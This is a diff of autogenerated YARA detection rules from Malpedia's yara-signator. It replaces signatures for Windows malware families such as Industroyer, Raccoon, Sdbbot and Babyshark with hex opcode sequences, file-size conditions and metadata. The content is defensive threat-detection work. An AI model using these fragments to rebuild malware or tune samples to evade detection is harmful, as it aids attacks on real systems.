-		$sequence_4 = { 03c2 894518 8b4514 85c0 c7457c00000000 894d70 0f8568010000 }
-		$sequence_5 = { f644244c01 66897c244e 7505 8064244cf7 668b4c244c 8b54247c 2b5510 }
-		$sequence_6 = { 85c0 740f 33c0 8b4c2414 e8???????? 83c418 c3 }
-		$sequence_7 = { 8d45ac 50 8d8d6cffffff 51 68???????? 8b5508 52 }
-		$sequence_8 = { 5d c3 56 ff15???????? 8b442414 50 ff15???????? }
-		$sequence_9 = { 83e103 68???????? f3a4 e8???????? 83c404 8d942488000000 8d9b00000000 }
+		$sequence_0 = { 480f4de8 4c8bc5 e8???????? 498b07 482bdd }
+		$sequence_1 = { ffc3 3b5f18 72d9 33c0 488b5c2450 }
+		$sequence_2 = { 3b5f18 72d9 33c0 488b5c2450 488b6c2458 488b742460 4883c420 }
+		$sequence_3 = { 48d1e9 482bc1 4c3bf8 77e3 }
+		$sequence_4 = { 4c0f45452f 498b02 488d4d27 48894c2438 488d4d18 }
+		$sequence_5 = { 488d4101 488903 8b4314 488b0b c1e80c a801 }
+		$sequence_6 = { 4803d1 eb03 0fb7d1 498bce ff15???????? }
+		$sequence_7 = { 488bc6 488bd9 482bc2 493bc0 4c0f42c8 4883791810 488bc1 }
+		$sequence_8 = { 7413 4c8bc3 ba01000000 498bcf e8???????? }
+		$sequence_9 = { 66ffc6 663b7706 72cf 488bd7 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 635904
 }
-rule MALPEDIA_Win_Getmail_Auto : FILE
+rule MALPEDIA_Win_Doubleback_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4780e834-4739-57cb-8526-1265945d26d9"
+		id = "c1c6eec3-17ca-5077-8f4d-8926ef885c3f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.getmail_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doubleback_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f392c7d302de7668ac9b3700c0372997d2f7bd630f275b38a7b8618bbfecba8b"
+		logic_hash = "a12a729d1e3eac6cc5269daa7ad2d63c829a0d3d51d586ba012dff78e07be60d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110057,32 +110201,32 @@ rule MALPEDIA_Win_Getmail_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 895e28 895e2c 8b4618 3bc3 741d }
-		$sequence_1 = { e8???????? 83c404 8b4c2440 895c2430 3bcb 895c2434 }
-		$sequence_2 = { 3bc6 7709 e8???????? 8b54244c 85f6 7643 8d2c32 }
-		$sequence_3 = { c1e902 f3a5 8bcb 83e103 f3a4 a1???????? 85c0 }
-		$sequence_4 = { 51 50 e8???????? 83c408 c3 81ec04010000 b941000000 }
-		$sequence_5 = { 8b742474 896c243c 881c28 8b4c241c }
-		$sequence_6 = { 89442424 7426 8d54246c 53 52 }
-		$sequence_7 = { 894c2478 68???????? 68???????? e8???????? 83c40c 8d542414 8d442468 }
-		$sequence_8 = { 49 51 e8???????? 83c404 8b4c245c 897c2448 897c244c }
-		$sequence_9 = { 8b10 50 ff5208 eb52 8b08 8d542414 52 }
+		$sequence_0 = { 3dab3f0000 755e b9ad060000 eb57 b9a7060000 eb50 b947060000 }
+		$sequence_1 = { 742a 3d39380000 741c 3dd73a0000 740e 3dab3f0000 755e }
+		$sequence_2 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
+		$sequence_3 = { 740e 3dab3f0000 755e b9ad060000 eb57 }
+		$sequence_4 = { 741c 3dd73a0000 740e 3dab3f0000 755e b9ad060000 eb57 }
+		$sequence_5 = { eb49 b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
+		$sequence_6 = { 774f 7446 3d00280000 7438 3d5a290000 }
+		$sequence_7 = { b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 2d63450000 }
+		$sequence_8 = { 3dd73a0000 740e 3dab3f0000 755e b9ad060000 }
+		$sequence_9 = { 741c 3dd73a0000 740e 3dab3f0000 755e }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Fobber_Auto : FILE
+rule MALPEDIA_Win_Sdbbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c71dc66-f917-5ba2-9fb8-1fb21c7a75f0"
+		id = "b16da93b-bcb6-5a59-8ee7-f2b1db92f76a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fobber_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sdbbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sdbbot_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "61538df65ce7e18f8d160f3c894437f915290dca7e112a40d32b84ca774989b9"
+		logic_hash = "869a5323254bb19be34889ba3dd9fff300dc452318f40f9c34e9c0c7014796e1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110096,38 +110240,39 @@ rule MALPEDIA_Win_Fobber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5508 8b4d0c 3002 c0c803 }
-		$sequence_1 = { 57 e8???????? 85c0 740f 89c1 8b450c fc }
-		$sequence_2 = { 660fc146f9 6685c0 7515 0fb646f8 50 0fb746f6 }
-		$sequence_3 = { 8d4d08 51 ff31 ffd0 85c0 7403 8b4508 }
-		$sequence_4 = { 55 89e5 51 57 8b7d08 57 }
-		$sequence_5 = { 31c9 f7d1 fc f2ae f7d1 }
-		$sequence_6 = { 55 89e5 31c0 50 50 ff750c ff7508 }
-		$sequence_7 = { 3002 c0c803 0453 42 }
-		$sequence_8 = { 0485 40 47 c9 7283 e61f }
-		$sequence_9 = { 028736c8f07c 7d41 6f 01e9 }
-		$sequence_10 = { 4a bdb098f55a 6798 5b 348d 5a }
-		$sequence_11 = { 81c112500000 81c1d6530000 81e951b50000 81e9a88bffff 81c17d5b0000 }
-		$sequence_12 = { 8bec a1???????? 80383f 7414 6a00 }
-		$sequence_13 = { df9c6182a5b1b2 e8???????? 54 e437 d3766f fa 42 }
-		$sequence_14 = { d470 44 b200 4f }
-		$sequence_15 = { 8d46ff 0f85196e0100 807dfc00 7407 8b4df8 836170fd 5e }
+		$sequence_0 = { 8bf0 56 8975fc ff55ec }
+		$sequence_1 = { 81f95bbc4a6a 0f85cf000000 8b5dfc bf04000000 8b7310 8b463c 8b443078 }
+		$sequence_2 = { ff55e8 8bd8 85db 7460 }
+		$sequence_3 = { 8b75fc 8b7dec 83c714 897dec 833f00 }
+		$sequence_4 = { 33c9 8a02 660f1f440000 c1c90d 8d5201 }
+		$sequence_5 = { 8b5b10 8b433c 8b441878 03c3 8945dc }
+		$sequence_6 = { 84c0 75ef 81f9b80a4c53 7521 8b45dc 0fb70e }
+		$sequence_7 = { 81c2ffff0000 03cf 46 6685d2 }
+		$sequence_8 = { c3 803d????????00 750c c605????????01 }
+		$sequence_9 = { 0fb602 84c0 75ed 81f9b80a4c53 751b }
+		$sequence_10 = { 488b5c2478 41bb01000000 4d85f6 7414 }
+		$sequence_11 = { 49ffca 0fb7ca 0fb7c2 66c1e90c 6683f90a 7514 }
+		$sequence_12 = { 0fb602 0f1f440000 c1c90d 488d5201 0fbec0 03c8 }
+		$sequence_13 = { 4c89b42480000000 41bd04000000 e9???????? 3d5d68fa3c 0f859e000000 4d8b5720 }
+		$sequence_14 = { 664585db 75ac 4c8bb42480000000 41b9ffff0000 488b5c2478 }
+		$sequence_15 = { 4963553c 488d4ac0 4881f9bf030000 770a 42813c2a50450000 7405 }
+		$sequence_16 = { 4885d2 7417 4d8bc6 4d2bc5 0fb601 41880408 488d4901 }
 
 	condition:
-		7 of them and filesize < 188416
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Heloag_Auto : FILE
+rule MALPEDIA_Win_Brbbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b40ebeb0-65d9-5544-943f-e43dc7de3667"
+		id = "90f3eca3-a8ac-5396-b696-f6c36e242527"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heloag_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brbbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brbbot_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3cbec035b3658dcc2108c96dd5a7b448e19c5bb5b801b5096a103c1055c563fa"
+		logic_hash = "01b7f091ad5c5584725e6a754a08338f9a2c33e3759aac15777f95b901cf8ec0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110141,40 +110286,34 @@ rule MALPEDIA_Win_Heloag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c9ff bf???????? 33c0 8965f0 f2ae f7d1 }
-		$sequence_1 = { 8945e4 85db 0f847b020000 8bfb 83c9ff 33c0 }
-		$sequence_2 = { 8bf7 8bfa 8d95dcfeffff c1e902 f3a5 }
-		$sequence_3 = { 64892500000000 81ec48030000 53 56 }
-		$sequence_4 = { 33c0 bf???????? 881d???????? f3ab 8b4df4 64890d00000000 5f }
-		$sequence_5 = { 7577 56 ff15???????? 85c0 7507 }
-		$sequence_6 = { b907000000 bf???????? c605????????01 50 f3a5 }
-		$sequence_7 = { 8bca 53 83e103 53 f3a4 a1???????? }
-		$sequence_8 = { 49 51 56 68???????? }
-		$sequence_9 = { a1???????? 894304 8b5608 895308 }
-		$sequence_10 = { 8a442413 6a00 8bce 8806 ff15???????? }
-		$sequence_11 = { 84c0 742d 8b7604 85f6 7506 8b35???????? 8b7b04 }
-		$sequence_12 = { 8b11 8bcf 52 6a00 50 }
-		$sequence_13 = { 53 8bcd ff15???????? 6a00 6a00 }
-		$sequence_14 = { 894b0c 8a48ff fec1 8848ff eb3c 6a01 }
-		$sequence_15 = { 3bcd 8b07 89442410 7464 }
+		$sequence_0 = { 85c0 0f88f0000000 488d0d421d0100 e8???????? 8bd8 85c0 0f88da000000 }
+		$sequence_1 = { 418bd4 488bce 4c89742460 e8???????? 4c8b7540 8bd8 }
+		$sequence_2 = { 488bf8 0f85d5000000 488d0d07460000 ff15???????? 488bf0 4885c0 }
+		$sequence_3 = { 7528 48833d????????00 741e 488d0d7dde0000 e8???????? 85c0 740e }
+		$sequence_4 = { 4c895c3040 4b8b84f9c05a0100 498bd6 41b80a000000 }
+		$sequence_5 = { 752e 4b8b84f9c05a0100 8a4c303a 413ac8 741d 85db }
+		$sequence_6 = { 33d2 41b803010000 c68424f001000000 e8???????? 488d8c24e1000000 33d2 }
+		$sequence_7 = { 488bce ff15???????? 85c0 747f 035c2420 }
+		$sequence_8 = { 53 4883ec70 33db 48897010 }
+		$sequence_9 = { 33d2 897c2420 488be8 488906 ff15???????? 85c0 7506 }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 198656
 }
-rule MALPEDIA_Win_Gaudox_Auto : FILE
+rule MALPEDIA_Win_Industroyer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15dc0059-f613-5f22-9f93-85ef1cdd6f7e"
+		id = "4666d9b8-e696-5bb0-aac9-aa0f0ad9f1b7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gaudox_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industroyer_auto.yar#L1-L376"
 		license_url = "N/A"
-		logic_hash = "cb1127199cac9fdec74f4f176c228a4ea35dac692422428d5b8a3d96735f1430"
+		logic_hash = "6dea509664f187f90fcd96f2db4ab697e4dc6a135630fab4d4323ee78e00c0a5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110186,32 +110325,62 @@ rule MALPEDIA_Win_Gaudox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89450c 8b4dfc 8d4508 50 8b450c 8b11 8d04b0 }
-		$sequence_1 = { 8b4dfc 890e 5e 8be5 5d c3 8b01 }
-		$sequence_2 = { b9???????? 57 ffb0b4010000 8d45e0 50 e8???????? }
-		$sequence_3 = { 50 6a00 6a00 6a02 56 6a0a 6a00 }
-		$sequence_4 = { 81f9361d0c5b 741b 81f9640eb076 7413 81f9738429e3 740b }
-		$sequence_5 = { 5d c20c00 b87b0000c0 5f 5e 5b 8be5 }
-		$sequence_6 = { 85c0 7411 3bc6 8d8ddcfeffff 0f47c6 50 }
-		$sequence_7 = { 6689442432 8d442460 89442434 a1???????? 8944244c 8d442430 }
-		$sequence_8 = { e8???????? ff75f0 6a02 6a03 e8???????? 33c0 5e }
-		$sequence_9 = { 83fa6c 751f 83f902 7212 6639544702 750b 810e00040000 }
+		$sequence_0 = { c745d404000000 e8???????? 50 8945e0 }
+		$sequence_1 = { 8b35???????? 83c014 894dec 034df4 034df0 }
+		$sequence_2 = { 56 6a03 ff7304 56 ff33 ff15???????? 85c0 }
+		$sequence_3 = { 6a03 56 6a01 6800000080 8d85e8faffff 50 }
+		$sequence_4 = { ff7508 33db 43 53 56 }
+		$sequence_5 = { 50 57 6805000020 53 c745f004000000 }
+		$sequence_6 = { ff7508 8d85f8fdffff 56 56 50 ff15???????? f7d8 }
+		$sequence_7 = { 8b450c 57 ff30 ff35???????? ffd6 }
+		$sequence_8 = { ffb598f3ffff ffd7 6800020000 8d85a0fbffff 50 }
+		$sequence_9 = { 6a02 ff15???????? 8bd8 85db 0f849d000000 8d85d0fdffff }
+		$sequence_10 = { 0f46f9 57 e8???????? 83c404 8bf0 8d45fc }
+		$sequence_11 = { b870100000 e8???????? a1???????? 33c5 8945fc 53 33db }
+		$sequence_12 = { 0fb6db 8b859cefffff 0f44df 83c604 }
+		$sequence_13 = { ff15???????? 8bf0 83feff 743c 6690 }
+		$sequence_14 = { 0f1145c0 50 0f1005???????? 6802000080 0f1145d0 ff15???????? }
+		$sequence_15 = { 85c0 7431 ff35???????? 8d442448 50 ffd6 }
+		$sequence_16 = { ffd7 59 e9???????? c745dc03000000 eb7c c745e0e0ff4000 }
+		$sequence_17 = { 898770020000 c70100000000 c7410400000000 c7410800000000 }
+		$sequence_18 = { 8bec 56 8bf1 57 8b7d08 57 8b0e }
+		$sequence_19 = { ff542414 83c404 ff742414 ff15???????? 57 ff15???????? ff15???????? }
+		$sequence_20 = { 83f81d 7cf1 eb07 8b0cc5dc084100 894de4 85c9 7455 }
+		$sequence_21 = { 7311 f30f7e0e 83e908 8d7608 660fd60f 8d7f08 8b048dc4ab4000 }
+		$sequence_22 = { 68???????? e8???????? 83c40c 8bb5f4efffff c6460101 }
+		$sequence_23 = { 6bc930 8b0485d01f0210 f644082801 7406 8b440818 5d }
+		$sequence_24 = { 8b0d???????? 81c178020100 890d???????? 8b4df4 }
+		$sequence_25 = { 0f851c0b0000 8d0d90fd4000 ba1b000000 e9???????? a900000080 }
+		$sequence_26 = { e8???????? 8b4604 0fb64003 50 68???????? e8???????? }
+		$sequence_27 = { 50 ff15???????? 85c0 7407 6a00 ffd0 83c404 }
+		$sequence_28 = { eb55 8b1c9db8c14000 56 6800080000 }
+		$sequence_29 = { 68???????? ff15???????? 6880ee3600 ff15???????? }
+		$sequence_30 = { 8b04b8 03c6 50 51 8b4c2428 }
+		$sequence_31 = { 83e802 7506 80790504 7420 33c0 5e }
+		$sequence_32 = { 017704 ebb5 8b4dec e8???????? 6a00 }
+		$sequence_33 = { 51 8d4b34 e8???????? 8b4338 894594 }
+		$sequence_34 = { e9???????? 55 8bec 81ecec020000 a1???????? }
+		$sequence_35 = { 8d8d98feffff ff30 e8???????? 8d8d7cfdffff 83fb04 0f86f7020000 }
+		$sequence_36 = { 50 ff36 e8???????? 83c40c 6b450830 }
+		$sequence_37 = { 57 8bfe 83e63f c1ff06 6bf630 8b04bd58984500 f644302880 }
+		$sequence_38 = { 751b 8365e800 c745ec271b4100 8d4de0 e8???????? }
+		$sequence_39 = { 8d8424cc000000 50 57 e8???????? 6a30 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 983040
 }
-rule MALPEDIA_Win_Matanbuchus_Auto : FILE
+rule MALPEDIA_Win_Devopt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a3fb7262-831d-5cfb-8abc-cea45bc828f6"
+		id = "bb55bee8-7a67-5968-98f9-09a9025ff6ad"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.matanbuchus_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.devopt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4f8fe54f712fa0006512f2c2876f2933c4c245339d29133362ca02de9b0dcb22"
+		logic_hash = "9b91ff04212580b4783bd5bcbd1899160fd4dd5cabce6d4170850a448d54a587"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110225,32 +110394,32 @@ rule MALPEDIA_Win_Matanbuchus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 e9???????? 8b45e8 8b4d08 03483c }
-		$sequence_1 = { 035120 8955dc 8b45f4 8b4d08 03481c 894dcc c745f000000000 }
-		$sequence_2 = { 8b55f0 8b4214 8945e8 33c9 66894dfc }
-		$sequence_3 = { 8b55ec 813a50450000 7407 33c0 e9???????? 8b45ec }
-		$sequence_4 = { 8b45e8 8b4d08 03483c 894dec 8b55ec }
-		$sequence_5 = { 8b4508 8945f8 8b4df8 8b513c 035508 }
-		$sequence_6 = { 69c293010001 50 b901000000 c1e100 034d08 51 e8???????? }
-		$sequence_7 = { 034508 8945e0 8b4de0 8b5178 035508 8955f0 8b45f0 }
-		$sequence_8 = { 8955f4 8b45f4 83780400 0f84a6000000 8b4df4 }
-		$sequence_9 = { 894dec 8b55ec 813a50450000 7407 }
+		$sequence_0 = { 8b4df4 ff91fc000000 8945ec 8b55fc 8b45f4 8b4df4 ff9100010000 }
+		$sequence_1 = { ff969c000000 e9???????? 8b45fc 8b806c030000 8b80a4000000 8b55fc 8b929c000000 }
+		$sequence_2 = { eb36 c745ecffffffff 8db42600000000 8b45ec 8d4001 8945ec 8b45fc }
+		$sequence_3 = { ff75e4 e8???????? a9ffffffff 7402 eb0e ba???????? 89e8 }
+		$sequence_4 = { eb1b 81fa6079feff 7e07 3df0d8ffff 7f08 66c74590f0d8 eb04 }
+		$sequence_5 = { e8???????? 84c0 7502 eb1e 8b45f8 8b40f8 8b55f0 }
+		$sequence_6 = { f77908 89c1 8b45ec ba01000000 8b7dec 8b5f04 ff5308 }
+		$sequence_7 = { ba00000000 e8???????? b101 ba01000000 b8???????? e8???????? 8b55f4 }
+		$sequence_8 = { 8d4de0 8d55d8 8b45f4 8b5df4 8b1b ff9334030000 8b5510 }
+		$sequence_9 = { ff537c 8b45f0 85c0 7403 8b40fc 8945f4 8b45fc }
 
 	condition:
-		7 of them and filesize < 13077504
+		7 of them and filesize < 4645888
 }
-rule MALPEDIA_Win_Kdcsponge_Auto : FILE
+rule MALPEDIA_Win_Raccoon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93fd80a3-a643-5f56-b47f-f9e7f12c352c"
+		id = "a1c26303-9125-5fd7-aa51-ad1eac6fcf97"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kdcsponge"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kdcsponge_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.raccoon_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "4a397cc9ed7623d7a2a288b58acb6ea4c1ff2bde7c30c2fd6b35d7ed37df75f7"
+		logic_hash = "490a547d291c29560eb0a750de21265ccd9b82463cd0d04b08babd8cc5f3ca9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110264,32 +110433,32 @@ rule MALPEDIA_Win_Kdcsponge_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3881c3040000 7506 8881c5040000 e8???????? 488d8b44030000 488bd3 4883c420 }
-		$sequence_1 = { 418d4102 83f801 761e 498bc9 488d1553b40100 83e13f 498bc1 }
-		$sequence_2 = { c781a004000002000000 c7416000002000 48c7812801000000000200 48c7815801000001000000 48c7816001000001000000 c7813001000020000000 }
-		$sequence_3 = { c745d408574883 488d0d084a0200 c745d8ec20488b c745dc7918488b c745e0d94885ff c745e40f8500c5 c745e8010033c0 }
-		$sequence_4 = { 8b8b60040000 83c102 c7837c04000008000000 48ffc1 48018b20040000 488b8b6c040000 488b8320040000 }
-		$sequence_5 = { 4d85c0 7428 488b8220040000 48ffc0 493bc0 7219 c782a904000001000000 }
-		$sequence_6 = { 488d1565f50300 488b04c2 48898160010000 48ff8120040000 48c781e401000000000300 48c781f801000010000000 48c781a000000001000000 }
-		$sequence_7 = { 488b8320040000 488d9344030000 4c8bc3 0fb648ff c1e904 4883c420 5b }
-		$sequence_8 = { e9???????? 8b8138040000 89813c040000 c6810904000008 c7814004000070000000 eb44 80b9b104000001 }
-		$sequence_9 = { c7416000000100 48c7812801000000000200 48c7815801000001000000 48c7816001000001000000 c7813001000040000000 c3 33c0 }
+		$sequence_0 = { e8???????? 59 85c0 7505 8a07 8806 46 }
+		$sequence_1 = { 85ff 7464 833e00 53 }
+		$sequence_2 = { 7437 837b1410 7202 8b1b 837f1410 7202 8b3f }
+		$sequence_3 = { 897dec 3b7de4 75bf 83f9fa 7e1e 83c108 c1e308 }
+		$sequence_4 = { 8bf0 59 85f6 742d 8d4514 50 }
+		$sequence_5 = { 57 8b7d0c 8955f8 894df4 85ff 7403 832700 }
+		$sequence_6 = { 03ce e8???????? 8d4dd4 e8???????? 8b4df4 8bc6 }
+		$sequence_7 = { e8???????? 89450c 85c0 0f8486000000 53 8b1d???????? 68???????? }
+		$sequence_8 = { 56 57 ff15???????? 8b35???????? 57 ffd6 ff75e8 }
+		$sequence_9 = { 8bcf e8???????? 59 59 8d7301 56 ff15???????? }
 
 	condition:
-		7 of them and filesize < 720896
+		7 of them and filesize < 1212416
 }
-rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
+rule MALPEDIA_Win_Taintedscribe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "df6c143a-04c8-53dd-b585-7785e6f7c9b7"
+		id = "f1cc2e00-4207-5694-9f4b-262fcd7729da"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_rave"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_rave_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.taintedscribe_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "d35d8eb6aefe7cc5c299f90e5678dfb9d7a049e0361b4bce0487fde286aa34fe"
+		logic_hash = "5d981495a3922cbb61b73e09b9b5becae7637fb3153cbba90f67db62eec8bfc1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110303,34 +110472,34 @@ rule MALPEDIA_Win_Webc2_Rave_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6aff 8d542438 53 52 6a02 894c2444 }
-		$sequence_1 = { ff15???????? 8b442418 5f 5e 5d 81c420030000 c3 }
-		$sequence_2 = { 8b4e04 51 ffd7 8b4608 3bc3 7409 50 }
-		$sequence_3 = { 83ec68 8d442410 50 e8???????? }
-		$sequence_4 = { 8b442414 c6043000 85db 7409 53 e8???????? 83c404 }
-		$sequence_5 = { 8bf8 83ffff 740d 8b4c2410 6a00 51 56 }
-		$sequence_6 = { 750c 68d0070000 45 ff15???????? 83fd0a 7419 }
-		$sequence_7 = { 57 b941000000 33c0 8d7c2420 f3ab aa }
-		$sequence_8 = { 8d8c2454010000 68???????? 51 ffd6 897c2418 8d94245c020000 8d842454010000 }
-		$sequence_9 = { 50 ffd5 83c408 e9???????? 8b4e10 6aff 8d542438 }
+		$sequence_0 = { 8916 8b4dfc 5e 33cd 33c0 5b }
+		$sequence_1 = { 668995e4f9ffff e8???????? 8b8590f7ffff 8d95e4f9ffff }
+		$sequence_2 = { 8bf8 f3a5 8b4b28 83c414 85c9 7518 5f }
+		$sequence_3 = { d3e3 33c0 85db 7e22 8da42400000000 }
+		$sequence_4 = { 8b4dcc 894308 8b45d0 50 51 89530c }
+		$sequence_5 = { 8b5358 898d88fbffff 8b4b50 0f94c0 807b1400 899584fbffff 898d8cfbffff }
+		$sequence_6 = { 5b 5d c20c00 83f803 7574 }
+		$sequence_7 = { 898da8fbffff 8d45e8 8985b4fcffff 8b433c 8bd0 8d4ddc }
+		$sequence_8 = { 6a00 6a00 ff15???????? 85c0 7516 }
+		$sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Suppobox_Auto : FILE
+rule MALPEDIA_Win_Babyshark_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "177ef819-f180-537c-8a5b-50145cc2ea86"
+		id = "bba62dea-b8fb-5177-af59-ee7484609223"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.suppobox_auto.yar#L1-L191"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.babyshark_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a5e7699d7d2692f12be7c31662694dcf4bf84741bea11b2882b9a09666e09210"
+		logic_hash = "170a55c792dd841a430b5276e4b7ea8cd0c0e2d28c406b503a22728951bd6c1d"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110342,46 +110511,34 @@ rule MALPEDIA_Win_Suppobox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bc8 7d10 a1???????? 2b05???????? }
-		$sequence_1 = { 7412 8b0d???????? 030d???????? 890d???????? }
-		$sequence_2 = { 7412 a1???????? 2b05???????? a3???????? }
-		$sequence_3 = { 8945f0 a1???????? 83e801 a3???????? }
-		$sequence_4 = { 7e10 a1???????? 0305???????? a3???????? }
-		$sequence_5 = { 7d10 a1???????? 3305???????? a3???????? }
-		$sequence_6 = { 890d???????? e8???????? 8bf0 e8???????? 03f0 }
-		$sequence_7 = { 01c6 39fe 0f8d2f020000 80bc2ef4f7ffff0a }
-		$sequence_8 = { 01c6 ebdb ff7510 57 }
-		$sequence_9 = { 8d4801 83c601 39f7 898b00010000 881403 }
-		$sequence_10 = { 8d4801 894ddc 0fbf4dd4 01c8 }
-		$sequence_11 = { 01c6 39fe 0f8d7e010000 80bc2ef4f7ffff0a }
